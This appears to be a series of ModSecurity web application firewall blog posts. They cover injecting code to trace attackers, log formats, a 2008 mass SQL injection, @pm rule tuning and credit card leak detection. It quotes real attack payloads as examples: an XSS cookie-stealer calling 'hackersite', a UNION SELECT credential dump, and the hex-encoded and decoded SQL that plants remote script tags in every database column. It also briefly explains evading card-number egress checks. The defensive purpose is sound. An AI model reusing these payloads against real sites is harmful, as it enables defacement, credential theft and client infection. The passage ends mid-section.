SecRule TX:ALERT "@eq 1" "phase:3,nolog,pass,chain,prepend:'<APPLET CODE=\"MyAddress.class\" MAYSCRIPT WIDTH=0 HEIGHT=0>
<PARAM NAME=\"URL\" VALUE=\"grab_ip.php?IP=\">
<PARAM NAME=\"ACTION\" VALUE=\"AUTO\"></APPLET>'" 
SecRule RESPONSE_CONTENT_TYPE "^text/html"

So, if an attacker sends a malicious request that ModSecurity triggers on, this rule will then fire and it will send the injected code to the client. Our Apache access_logs will show data similar to this:

203.160.1.47 - - [20/Jan/2008:21:15:03 -0500] "GET /cgi-bin/foo.cgi?param=<script>document.write('<img%20
src="http://hackersite/'+document.cookie+'"')</script> HTTP/1.1" 500 676 
203.160.1.47 - - [20/Jan/2008:21:15:03 -0500] "GET /cgi-bin/grab_ip.php?IP=222.141.50.175 HTTP/1.1" 404 207

As you can see, even though the IP address in the access_logs shows 203.160.1.47, the data returned in the QUERY_STRING portion of the second line shows that the real IP address of the attacker is 222.141.50.175. This would mean that in this case, the attacker's system was not on a private network (perhaps just connecting their computer directly to the internet). In this case, you would be able to obtain the actual IP of an attacker who was conducting a manual attack with a browser.

Attacker -> Proxy -> ... -> Proxy -> Target Website.
    ^                         ^
222.141.50.175           203.160.1.47
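Correlating the callback requests with the proxy address is then a matter of log parsing. A hedged sketch (the `correlate` helper and its regex are hypothetical, written to match the access_log format shown above):

```python
import re

# Scan Apache access-log lines for the injected applet's callback
# (grab_ip.php?IP=...) and pair the connection IP the server saw with the
# address the client reported about itself.
CALLBACK = re.compile(
    r'^(?P<proxy_ip>\S+) .*?"GET [^"]*grab_ip\.php\?IP=(?P<real_ip>[\d.]+)')

def correlate(log_lines):
    """Return (connection IP, self-reported IP) pairs from callback hits."""
    pairs = []
    for line in log_lines:
        m = CALLBACK.match(line)
        if m:
            pairs.append((m.group("proxy_ip"), m.group("real_ip")))
    return pairs
```

Run against the second log line above, this would pair 203.160.1.47 (the last proxy hop) with 222.141.50.175 (the self-reported address).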

Caveats

Internal LAN

This example is extremely experimental. As the previous section indicates, if the attacker were behind a router (on a private LAN) then the address range would probably have been in the 192.168.xxx.xxx range.

Attacker -> Firewall/Router -> ... -> Proxy -> Target Website.
    ^                                   ^
192.168.1.100                      203.160.1.47

This type of data would not be as useful for our purposes as it wouldn't help for a traceback.

Non-Browser Clients

Since a majority of web attacks are automated, odds are that the application that is sending the exploit payload is not actually a browser but rather some sort of scripting client. This would mean that the javascript/java code would not actually execute.

Conclusion

Hopefully you can now see the potential power of the content injection capability in ModSecurity. The goal of this post was to get you thinking about the possibilities. For other ideas on the interesting types of javascript that we could inject, check out PDP's AttackAPI Atom database. ModSecurity will eventually expand this functionality to allow for injecting content at specific locations of a response body instead of just at the beginning or at the end.

 

Yes, the Tide for Web Application Firewalls is Turning

Some time ago I decided to start a new blog, a place where I would be able to address the topics that are not ModSecurity specific. I felt the ModSecurity Blog has its purpose and a happy audience; I didn't want it to lose its focus. Today I made my first proper post at this new blog:

"There is a long-running tradition in the web application firewall space; every year we say: "This year is going to be the one when web application firewalls take off!" So far, every year turned out to be a bit of a disappointment in this respect. This year feels different, and I am not saying this because it's a tradition to do so. Recent months have seen a steady and significant rise in the interest in and the recognition of web application firewalls. But why is it taking so long?"

To read more please continue to "Tide is turning for web application firewalls".

 

ModSecurity Data Formats

I have just added a new section to the ModSecurity v2.5 Reference Manual, describing the data formats we use. Nothing spectacular, I know, but it is always nice when things get written down.

Alerts

Below is an example of a ModSecurity alert entry. It is always contained on a single line but we've broken it here into multiple lines for readability.

Access denied with code 505 (phase 1). Match of "rx ^HTTP/(0\\\\.9|1\\\\.[01])$"
against "REQUEST_PROTOCOL" required. [id "960034"] [msg "HTTP protocol version
is not allowed by policy"] [severity "CRITICAL"] [uri "/"] [unique_id
"PQaTTVBEUOkAAFwKXrYAAAAM"]

Each alert entry begins with the engine message:

Access denied with code 505 (phase 1). Match of "rx ^HTTP/(0\\\\.9|1\\\\.[01])$"
against "REQUEST_PROTOCOL" required.

The engine message consists of two parts. The first part tells you whether ModSecurity acted to interrupt transaction or rule processing. If it did nothing the first part of the message will simply say "Warning". If an action was taken then one of the following messages will be used:

  • Access denied with code %0 - a response with status code %0 was sent.
  • Access denied with connection close - connection was abruptly closed.
  • Access denied with redirection to %0 using status %1 - a redirection to URI %0 was issued using status %1.
  • Access allowed - rule engine stopped processing rules (transaction was unaffected).
  • Access to phase allowed - rule engine stopped processing rules in the current phase only. Subsequent phases will be processed normally. Transaction was not affected by this rule but it may be affected by any of the rules in the subsequent phase.
  • Access to request allowed - rule engine stopped processing rules in the current phase. Phases prior to request execution in the backend (currently phases 1 and 2) will not be processed. The response phases (currently phases 3 and 4) and others (currently phase 5) will be processed as normal. Transaction was not affected by this rule but it may be affected by any of the rules in the subsequent phase.

The second part of the engine message explains why the event was generated. Since it is automatically generated from the rules, it will be very technical in nature, talking about operators and their parameters, and will give you insight into what the rule looked like. But this message cannot give you insight into the reasoning behind the rule. A well-written rule will always specify a human-readable message (using the msg action) to provide further clarification.
The metadata fields are always placed at the end of the alert entry. Each metadata field is a text fragment that consists of an opening bracket, followed by the metadata field name, followed by the value in double quotes and the closing bracket. What follows is the text fragment that makes up the id metadata field.

[id "960034"]

The following metadata fields are currently used:

  1. id - Unique rule ID, as specified by the id action.
  2. rev - Rule revision, as specified by the rev action.
  3. msg - Human-readable message, as specified by the msg action.
  4. severity - Event severity, as specified by the severity action.
  5. unique_id - Unique event ID, generated automatically.
  6. uri - Request URI.
  7. logdata - Transaction data fragment, as specified by the logdata action.
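Because every metadata field follows the same [name "value"] shape, the whole set can be pulled out of an alert line with one regular expression. A minimal sketch (the `parse_metadata` helper is hypothetical, not part of ModSecurity):

```python
import re

# Each metadata field is an opening bracket, a field name, a space, the value
# in double quotes, and a closing bracket, e.g. [id "960034"].
FIELD = re.compile(r'\[([a-z_]+) "((?:[^"\\]|\\.)*)"\]')

def parse_metadata(alert):
    """Return the metadata fields of an alert entry as a dict."""
    return {name: value for name, value in FIELD.findall(alert)}
```

Applied to the example alert above, this yields entries such as id → 960034 and severity → CRITICAL.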

Alerts in Apache

Every ModSecurity alert conforms to the following format when it appears in the Apache error log:

[Sun Jun 24 10:19:58 2007] [error] [client 192.168.0.1] ModSecurity: ALERT_MESSAGE

The above is a standard Apache error log format. The "ModSecurity:" prefix is specific to ModSecurity. It is used to allow quick identification of ModSecurity alert messages when they appear in the same file next to other Apache messages.
The actual message (ALERT_MESSAGE in the example above) is in the same format as described in the Alerts section.

Alerts in Audit Log

Alerts are transported in the H section of the ModSecurity Audit Log. Alerts will appear each on a separate line and in the order they were generated by ModSecurity. Each line will be in the following format:

Message: ALERT_MESSAGE

Below is an example of an entire H section (followed by the Z section terminator):

--c7036611-H--
Message: Warning. Match of "rx ^apache.*perl" against "REQUEST_HEADERS:User-Agent" required. [id "990011"]
 [msg "Request Indicates an automated program explored the site"] [severity "NOTICE"]
Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100}
 ?\\bfrom|from\\b.{1,100}?\\bwhere)|.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_
 (?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:c. [id "950001"]
 [msg "SQL Injection Attack. Matched signature: union select"] [severity "CRITICAL"]
Stopwatch: 1199881676978327 2514 (396 2224 -)
Producer: ModSecurity v2.x.x (Apache 2.x)
Server: Apache/2.x.x
  
--c7036611-Z--

Audit Log

ModSecurity records one transaction in a single audit log file. Below is an example:

--c7036611-A--
[09/Jan/2008:12:27:56 +0000] OSD4l1BEUOkAAHZ8Y3QAAAAH 209.90.77.54 64995 80.68.80.233 80
--c7036611-B--
GET //EvilBoard_0.1a/index.php?c='/**/union/**/select/**/1,concat(username,char(77),
 password,char(77),email_address,char(77),info,char(77),user_level,char(77))/**/from
 /**/eb_members/**/where/**/userid=1/*http://kamloopstutor.com/images/banners/on.txt?
 HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.example.com
User-Agent: libwww-perl/5.808
  
--c7036611-F--
HTTP/1.1 404 Not Found
Content-Length: 223
Connection: close
Content-Type: text/html; charset=iso-8859-1
  
--c7036611-H--
Message: Warning. Match of "rx ^apache.*perl" against "REQUEST_HEADERS:User-Agent" required. [id "990011"]
 [msg "Request Indicates an automated program explored the site"] [severity "NOTICE"]
Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100}
 ?\\bfrom|from\\b.{1,100}?\\bwhere)|.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_
 (?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:c. [id "950001"]
 [msg "SQL Injection Attack. Matched signature: union select"] [severity "CRITICAL"]
Apache-Error: [file "/tmp/buildd/apache2-2.x.x/build-tree/apache2/server/core.c"] [line 3505] [level 3]
 File does not exist: /var/www/EvilBoard_0.1a
Stopwatch: 1199881676978327 2514 (396 2224 -)
Producer: ModSecurity v2.x.x (Apache 2.x)
Server: Apache/2.x.x
  
--c7036611-Z--

The file consists of multiple sections, each in a different format. Separators are used to delimit the sections:

--c7036611-A--

A separator always begins on a new line and conforms to the following format:

  1. Two dashes at the beginning.
  2. Unique boundary, which consists of several hexadecimal characters.
  3. One dash character.
  4. Section identifier, currently a single uppercase letter.
  5. Two trailing dashes at the end.

Refer to the documentation for SecAuditLogParts for the explanation of each part.
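The five-part separator format above can be matched with a single regular expression. A sketch (assuming a lowercase hexadecimal boundary of arbitrary length, as in the examples):

```python
import re

# Matches "--<hex boundary>-<section letter>--", e.g. "--c7036611-H--".
SEPARATOR = re.compile(r'^--([0-9a-f]+)-([A-Z])--$')

def parse_separator(line):
    """Return (boundary, section) for a separator line, else None."""
    m = SEPARATOR.match(line.strip())
    return (m.group(1), m.group(2)) if m else None
```

A parser can split an audit log file into sections by scanning for these lines and grouping everything between one separator and the next.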

 

SQL Injection Attack Infects Thousands of Websites

Here is a snippet from the just released SANS NewsBites letter:

"TOP OF THE NEWS --SQL Injection Attack Infects Thousands of Websites (January 7 & 8, 2008) At least 70,000 websites have fallen prey to an automated SQL injection attack that exploits several vulnerabilities, including the Microsoft Data Access Components (MDAC) flaw that Microsoft patched in April 2006. Users have been redirected to another domain [u c 8 0 1 0 . c o m], that attempted to infect users' computers with keystroke loggers. Many of the sites have since been scrubbed. The attack is similar to one launched last year against the Miami Dolphins' Stadium website just prior to the Super Bowl."

Additional coverage is available from several places:

So, there is a new, nasty bot on the loose that is targeting websites that use IIS/MS-SQL DB. It exploits non-specific SQL Injection vulnerabilities that exist in websites to inject malicious JavaScript into all fields. Once it gets victims to the infected web site, the script will try to exploit various known browser and plugin vulnerabilities. Essentially, the attack inserts <script src=http://?.uc8010.com/0.js></script> into all varchar and text fields in your SQL database.

While there has been much focus on the goal of the attack -- which is to try and exploit some browser (client) vulnerabilities to perhaps install some trojans or other malware -- not as much attention has been paid to the actual attack vector that led to the compromise: the SQL injection attack itself.

Here is an example IIS log entry of the SQL Injection attack that was posted to a user forum:

2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002
C0040004300200076006100720063006800610072002800320035003500290020004400450043004C004100520045002
0005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002
000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006
F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006
E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E0064002
00061002E00780074007900700065003D00270075002700200061006E0064002000280062002E0078007400790070006
5003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E007
80074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D003100360037002
90020004F00500045004E0020005400610062006C0065005F0043007500720073006F007200200046004500540043004
80020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007
200200049004E0054004F002000400054002C004000430020005700480049004C0045002800400040004600450054004
30048005F005300540041005400550053003D0030002900200042004500470049004E002000650078006500630028002
70075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B004
00043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006
800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C007300630072006900700074002
0007300720063003D0068007400740070003A002F002F0063002E007500630038003000310030002E0063006F006D002
F0030002E006A0073003E003C002F007300630072006900700074003E002700270027002900460045005400430048002
0004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F0072002
00049004E0054004F002000400054002C0040004300200045004E004400200043004C004F00530045002000540061006
2006C0065005F0043007500720073006F00720020004400450041004C004C004F0043004100540045002000540061006
2006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);�|178|80040e14|
Unclosed_quotation_mark_before_the_character_string_�G;DECLARE_@S_NVARCHAR(4000);SET_@S=CAST
(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002
C00400043002000′. - 202.101.162.73 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library)
 - 500 15248

If you decode the CAST values, here is the actual SQL that is being injected:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name 
from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 
or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+'
]))+''<script src=http://c.uc8010.com/0.js></script>''')FETCH NEXT FROM  
Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE @T 
varchar(255),@C
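The decoding step itself is simple: the CAST argument is an NVARCHAR hex literal, which is UTF-16LE text (two bytes per character). A minimal sketch (the `decode_cast_hex` helper is illustrative, not part of any tool):

```python
# Decode a 0x... NVARCHAR hex literal (UTF-16LE) back into SQL text.
def decode_cast_hex(hex_literal):
    if hex_literal.startswith("0x"):
        hex_literal = hex_literal[2:]
    return bytes.fromhex(hex_literal).decode("utf-16-le")
```

Feeding it the start of the payload above (0x4400450043004C00...) yields "DECLARE ...", the opening of the injected SQL.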

Mitigation Options

There are many remediation steps that can and should be taken.

Immediate Fix: Use ModSecurity and the Core Rules

If these web sites were front-ended by an Apache reverse proxy server (with ModSecurity and the Core Rules), then the back-end IIS/MS SQL application servers would have been protected against this attack. The free Core Rules, which are available for download from the ModSecurity web site, include SQL injection rules that would have identified and blocked this specific automated attack. Specifically, Rule ID 950001 in the modsecurity_crs_40_generic_attacks.conf file would have triggered on the "cast(" portion of the SQL injection string.

Mid-Term/Long-Term Fix: Correct the Code

Web Developers should identify and correct any Input Validation errors in their code.

 

Speaking About ModSecurity at ApacheCon Europe 2008

I will be speaking about ModSecurity at ApacheCon Europe in Amsterdam later this year. I hear ApacheCon Europe 2007 (also in Amsterdam) was great so I am looking forward to participating this year. Interestingly, for some reason or another, this will be the first time ModSecurity will be "officially" presented to the Apache crowd, in spite of the fact we've been going at it for years. As always, the best part is meeting the people you've been communicating with for years.

"Intrusion detection is a well-known network security technique -- it introduces monitoring and correlation devices to networks, enabling administrators to monitor events and detect attacks and anomalies in real-time. Web intrusion detection does the same but it works on the HTTP level, making it suitable to deal with security issues in web applications. This session will start with an overview of web intrusion detection and web application firewalls, discussing where they belong in the overall protection strategy. The second part of the talk will discuss ModSecurity and its capabilities. ModSecurity is an open source web application firewall that can be deployed either embedded (in the Apache HTTP server) or as a network gateway (as part of a reverse proxy deployment). Now in its fifth year of development, ModSecurity is mature, robust and flexible. Due to its popularity and wide usage it is now positioned as a de-facto standard in the web intrusion detection space."

 

Set-based Pattern Matching Example

ModSecurity 2.5 introduces two new operators (@pm and @pmFromFile) which implement set-based pattern matching by using the Aho-Corasick algorithm. Set-based matching is much quicker than using Regular Expressions. For those users who are concerned with performance (meaning trying to limit latency from a legitimate client's perspective), set-based pattern matching is a great enhancement. If rules are written properly, you can achieve the same level of security by using these new operators while simultaneously decreasing the time it takes to complete the check.

The key is to make sure that the set-based patterns (plain text strings) are critical to the success of the attack. So, when performing technical vulnerability research, you must first search for all of the necessary conditions for an attack to succeed. You then start by sending attacks that trigger the vulnerability remotely. The attack should be used to vary all the "interesting-looking" parts of the attack. Changes are made one at a time, in steps, keeping careful notes. (Strings, flags, length values, banners, version numbers, character encoding, white space... the list goes on. All are good things to vary.) If the attack succeeds even when a particular variable is set to a random value, that variable is not important for the signature or rule creation. Eventually you can identify the complete set of variables that are important to the attack's success, and arrive at a set of criteria that must be collectively satisfied for any attack to succeed. If there are multiple distinct attack vectors, you must perform this analysis on each one separately.

Given a set of criteria that must be satisfied for an attack to succeed, it is possible to describe rule logic that has virtually zero false negatives. That is, an attack simply cannot succeed unless the HTTP request has exactly the characteristics that the rule is looking for. Once you have identified these necessary components, they can then be used as the input strings to the set-based matching operators.

While set-based matching is very fast, you will still be missing some logic needed to validate the attack. It is for this reason that a good approach is to combine set-based matching with regular expression rules by chaining the individual rules together. Essentially, the 1st part of the chained rule uses the set-based matching operator as a pre-qualifier to very quickly check whether the transaction data has a high likelihood of matching. If the set-based matching portion matches, then the 2nd part of the chained rule (which uses the standard regular expression strings) is executed. The end result of this configuration is that for normal, non-malicious users, the latency of running all of the ModSecurity inspection rules will be decreased.

Let's take a look at this Blind SQL Injection rule from the Core Rules -

SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer
"(?:\b(?:(?:s(?:ys\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints
|atalog))|all_tables|tab)|elect\b.{0,40}\b(?:substring|ascii|user))|m(?:sys(?:(?:queri|ac)e|
relationship|column|object)s|ysql\.user)|c(?:onstraint_type|harindex)|waitfor\b\W*?\bdelay|
attnotnull)\b|(?:locate|instr)\W+\()|\@\@spid\b)" \
"capture,t:htmlEntityDecode,t:lowercase,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,
msg:'Blind SQL Injection Attack. Matched signature <%{TX.0}>',id:'950007',severity:'2'"

We can now update this rule to become a chained rule and use the @pm operator to run some pre-qualifier checks -

SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer 
"@pm sys.user_triggers sys.user_objects @@spid msysaces instr sys.user_views sys.tab 
charindex sys.user_catalog constraint_type locate select msysobjects attnotnull sys.user_tables
sys.user_tab_columns sys.user_constraints mysql.user sys.all_tables msysrelationships 
msyscolumns msysqueries" \
"chain,t:htmlEntityDecode,t:lowercase,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,
msg:'Blind SQL Injection Attack. Matched signature <%{TX.0}>',id:'950007',severity:'2'"
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer 
"(?:\b(?:(?:s(?:ys\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints
|atalog))|all_tables|tab)|elect\b.{0,40}\b(?:substring|ascii|user))|m(?:sys(?:(?:queri|ac)e|
relationship|column|object)s|ysql\.user)|c(?:onstraint_type|harindex)|attnotnull)\b|(?:locate|
instr)\W+\()|\@\@spid\b)" "capture,t:htmlEntityDecode,t:lowercase,t:replaceComments"

Now, let's test out the new rules to see what the processing time is for each of these rules if the request is normal. First let's look at what the time is for the normal Core Rule -

Executing operator "rx" with param "(?:\\b(?:(?:s(?:ys\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|obj
ect|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\b.{0,40}\\b(?:substring|ascii|user))|m(?:sys(
?:(?:queri|ac)e|relationship|column|object)s|ysql\\.user)|c(?:onstraint_type|harindex)|waitfor\\b\\W*?\
\bdelay|attnotnull)\\b|(?:locate|instr)\\W+\\()|\\@\\@spid\\b)" against ARGS:LoginEmail.
Target value: "aaa"
Operator completed in 14 usec.

Notice that it took approximately 14 usec for this optimized regular expression rule to run. Now, let's contrast this with the same rule running with the @pm operator -

Executing operator "pm" with param "sys.user_triggers sys.user_objects @@spid msysaces instr sys.user_v
iews sys.tab charindex sys.user_catalog constraint_type locate select msysobjects attnotnull sys.user_t
ables sys.user_tab_columns sys.user_constraints mysql.user sys.all_tables msysrelationships msyscolumns
 msysqueries" against ARGS:LoginEmail.
Target value: "aaa"
Operator completed in 9 usec.

As you can see, the processing time decreased to just 9 usec! This may not seem like much; however, keep in mind that this is just one rule. The overall effect of using the set-based pattern matching operators becomes apparent when you are using a larger number of rules. Keep an eye out for updates to the Core Rules, as they will be changing in the future to better leverage these new operators.

 

Detecting Credit Card Numbers in Network Traffic

1. Introduction

The Payment Card Industry Data Security Standard (PCI DSS for short) requires that credit card numbers are not transmitted in the clear and are not presented to users unmasked. Naturally, a network monitoring system such as an IDS or an IPS seems like an obvious enforcement point to ensure that such information is not sent over a network in violation of the standard, but a closer examination shows that a correct implementation is far from trivial. This write-up discusses several aspects of implementing a network monitoring system to detect leakage of credit card numbers:

  • Matching a credit card number sequence
  • Handling false positives using exceptions
  • Additional considerations, including evasion, logging, performance and other sensitive patterns.

2. Matching a Credit Card Number

2.1 Matching a Credit Card Number Sequence

A credit card number includes 13 to 16 digits. In addition, real-world presentations of a credit card number often include delimiters such as dashes or spaces, usually in specific positions. The following regular expression can be used to match credit card number sequences:

\d{4}[\- ]?\d{4}[\- ]?\d{2}[\- ]?\d{2}[\- ]?\d{1,4}

2.2 Boundaries

For long sequences of digits, which are common in network traffic, the above regular expression would match multiple sequences of the desired length. To avoid that, we need to define the sequence delimiters. What can or cannot be a valid delimiter may vary according to the application: not requiring any delimiter would generate many false positives, while requiring specific delimiters might lead to false negatives. For example, should we allow a leading "0"?

A reasonable choice for a delimiter would be any non-digit character. The resulting regular expression is:

(?<!\d)\d{4}[\- ]?\d{4}[\- ]?\d{2}[\- ]?\d{2}[\- ]?\d{1,4}(?!\d)

or, if a regular expression engine does not support look-ahead and look-behind assertions:

(?:^|[^\d])(\d{4}[\- ]?\d{4}[\- ]?\d{2}[\- ]?\d{2}[\- ]?\d{1,4})(?:[^\d]|$)
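As a quick sanity check, the look-around version behaves as intended in any engine with look-behind support (Python's re module, for example). A minimal sketch:

```python
import re

# The boundary-delimited card-number pattern from above.
CARD_RE = re.compile(r"(?<!\d)\d{4}[\- ]?\d{4}[\- ]?\d{2}[\- ]?\d{2}[\- ]?\d{1,4}(?!\d)")

# A delimited sequence is matched...
print(CARD_RE.search("order total, card 4111-1111-1111-1111 on file") is not None)  # True

# ...but a 13-16 digit window inside a longer digit run is not,
# because the look-behind and look-ahead forbid adjacent digits.
print(CARD_RE.search("session id 123456789012345678901234") is not None)  # False
```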

2.3 Validate the number against the LUHN checksum algorithm

However, sequences of 13 to 16 digits are not always credit card numbers. There are many other long numbers in typical network traffic. For example, we often find that identification numbers such as product IDs used in online stores are also 13-16 digit numbers. Luckily, a credit card number has to conform to the LUHN checksum function. A monitoring system can implement this algorithm and check that each detected sequence of digits is a valid credit card number.

Is this enough to avoid false positives? The LUHN function is a checksum function that generates an additional digit for each number, and it therefore matches 1 out of every 10 consecutive numbers. Since applications mostly use numbers of this length as identification numbers, and such applications typically use many consecutive numbers, roughly 1 out of every 10 numbers in use will happen to be a valid credit card number. Validating sequences using the LUHN formula therefore reduces false positives by 90% but does not eliminate them.
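The LUHN check itself is only a few lines; a minimal sketch in Python:

```python
def luhn_valid(number: str) -> bool:
    """Return True if the digit string passes the LUHN checksum.

    Walking from the rightmost digit, every second digit is doubled
    (subtracting 9 when the double exceeds 9); the number is valid
    when the total is divisible by 10.
    """
    total = 0
    for i, ch in enumerate(reversed(number)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

print(luhn_valid("4111111111111111"))  # True  (a well-known test number)
print(luhn_valid("4111111111111112"))  # False
```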

2.4 Checking Prefixes

To further reduce false positives, a monitoring system can check that the credit card number is not just valid but was also assigned. Naturally, the monitoring system cannot include a list of all assigned numbers, but it can check for the prefixes that were assigned to different financial institutions. A pretty good table of assigned prefixes can be found on Wikipedia.

Prefixes further reduce false positives and can be implemented using a regular expression. Assigned numbers account for 1% to 17% of the valid credit card numbers, depending on the sequence length. Prefixes are especially useful for eliminating the less frequently used sequences of 14 and 15 digits (1.2% and 2.5% prefix coverage respectively), leaving us with mostly the 13- and 16-digit sequences. The 13-digit sequences are a mystery: it is not clear whether Visa still uses them.

On the downside, using prefixes can lead to false negatives and requires updates to the monitoring system. For example, the Australian Bankcard range is marked as not in use in the Wikipedia table, but we recently saw such a number in actual traffic.

Using the LUHN formula together with prefix validation, the false positive rate can be reduced to approximately 1% of the rate achieved using pattern matching alone.
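A simplified prefix check can itself be expressed as a regular expression. The sketch below covers only a few well-known ranges and is deliberately incomplete; a real deployment should be generated from the full assigned-prefix table:

```python
import re

# Visa: 4..., 13 or 16 digits; MasterCard: 51-55, 16 digits;
# American Express: 34/37, 15 digits; Discover: 6011, 16 digits.
PREFIX_RE = re.compile(
    r"^(?:4\d{12}(?:\d{3})?"   # Visa
    r"|5[1-5]\d{14}"           # MasterCard
    r"|3[47]\d{13}"            # American Express
    r"|6011\d{12})$"           # Discover
)

print(bool(PREFIX_RE.match("4111111111111111")))  # True  (Visa prefix)
print(bool(PREFIX_RE.match("9111111111111111")))  # False (unassigned prefix)
```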

3. Handling False Positives Using Exceptions

In real-world systems 1% is still a high number, especially as sequences of digits are quite common in network traffic. If a human has to examine even hundreds of alerts a day, the monitoring system becomes useless. How can we improve the accuracy of the detection system?

One way to do that is to create exceptions for traffic known to generate such false positives. Exceptions can be defined both for non-credit-card sequences and for intentional, legitimate transmission of credit card numbers.

Such exceptions are a curse as much as a blessing, as overusing them or defining them too broadly will open big security holes. Let's take, for example, a 16-digit sequence used as a product ID on a web site. An exception using firewall-like rules, which support only an IP address and port, would have to ignore the entire web site to take care of such an issue. On the other hand, an application-aware monitoring system, such as a Web Application Firewall, can define a much more fine-grained exception. In the case above, a WAF rule can be defined to exclude credit card number detection for the specific field on the specific page used for the product ID.

Let's assume, for example, that ModSecurity rule number 955555 detects credit cards in an application's output, but the page /support/manual_payment.php, available only to store personnel, must display a credit card number. The following is a simple ModSecurity exception that ignores this rule for a single page:

<LocationMatch "/support/manual_payment.php">
    SecRuleRemoveById 955555
</LocationMatch>

The exception can further check that only a single credit card number is displayed on this page, and only in a certain part of the page.

Furthermore, the product ID may have some unique attributes, such as its own prefix or surrounding text, that can help make the exception narrower. A good example is Google AdSense. A site running Google ads needs to add the following piece of code to each page displaying ads:

<script type="text/javascript"><!--
google_ad_client = "pub-0000000000000000";
google_alternate_color = "ffffff";
...

Many times the 16-digit ID in the google_ad_client parameter is a valid credit card number. The following modified regular expression compensates for that:

(?<!google_ad_client = \"pub-)(?<!\d)(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})(?!\d)
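In an engine with fixed-width look-behind support (Python's re module, for example), the extra look-behind skips the AdSense ID while still catching card numbers elsewhere on the page. A quick sketch:

```python
import re

# The modified expression from above: the first look-behind suppresses
# matches that immediately follow the AdSense client-ID prefix.
AD_AWARE_RE = re.compile(
    r'(?<!google_ad_client = "pub-)'
    r'(?<!\d)(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})(?!\d)'
)

page = 'google_ad_client = "pub-0000000000000000"; invoice card 4111111111111111'
print(AD_AWARE_RE.findall(page))  # ['4111111111111111']
```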

4. Other Considerations

4.1 Evasion

Evasion techniques are a serious problem for intrusion detection systems in general, and even more so for detecting credit card numbers. Even the simplest transformation applied to a sequence will enable it to bypass detection. For example, an attacker performing an SQL injection attack in order to smuggle card numbers out could craft an SQL statement in such a way that each credit card number is multiplied by 2. As a result, the monitoring system would not detect the output as containing valid credit card numbers. Once the information is out, the attacker can easily divide each number by 2 to recover the original credit card number. Because they are so easy to evade, network monitoring systems, or indeed any other egress inspection systems, are not suitable for detecting malicious theft of credit card numbers. To prevent such theft one must focus on inbound protection.

But even unintentional leakage might be subject to unintentional evasion. A good example is encryption: in order to provide better security, many applications use encryption when transferring information over the network. Such encryption hides the traffic from the monitoring system. While most network-layer IDS solutions fail to decrypt SSL, web-layer security solutions always do that. You can read more about the SSL blind spot in this thread.

Another problem is the encoding built into network protocols, such as Unicode encoding or compression of HTTP traffic and base64 encoding of e-mail messages. Again, network-only monitoring systems would not detect the encoded traffic, while an application-aware monitoring system would decode it prior to inspection and therefore detect the leakage.
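Decoding before inspection is the key point. As an illustration, scanning a raw base64 payload finds nothing, while scanning the decoded form does (the card pattern below reuses the expression from section 2.2):

```python
import base64
import re

CARD_RE = re.compile(r"(?<!\d)\d{4}[\- ]?\d{4}[\- ]?\d{2}[\- ]?\d{2}[\- ]?\d{1,4}(?!\d)")

# A card number leaking inside a base64-encoded message body.
payload = base64.b64encode(b"card on file: 4111-1111-1111-1111").decode()

# The raw wire bytes contain no recognizable digit sequence...
print(CARD_RE.search(payload) is not None)                              # False

# ...but decoding first, the way an application-aware monitor would,
# exposes the leaked number.
print(CARD_RE.search(base64.b64decode(payload).decode()) is not None)   # True
```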

4.2 Logging

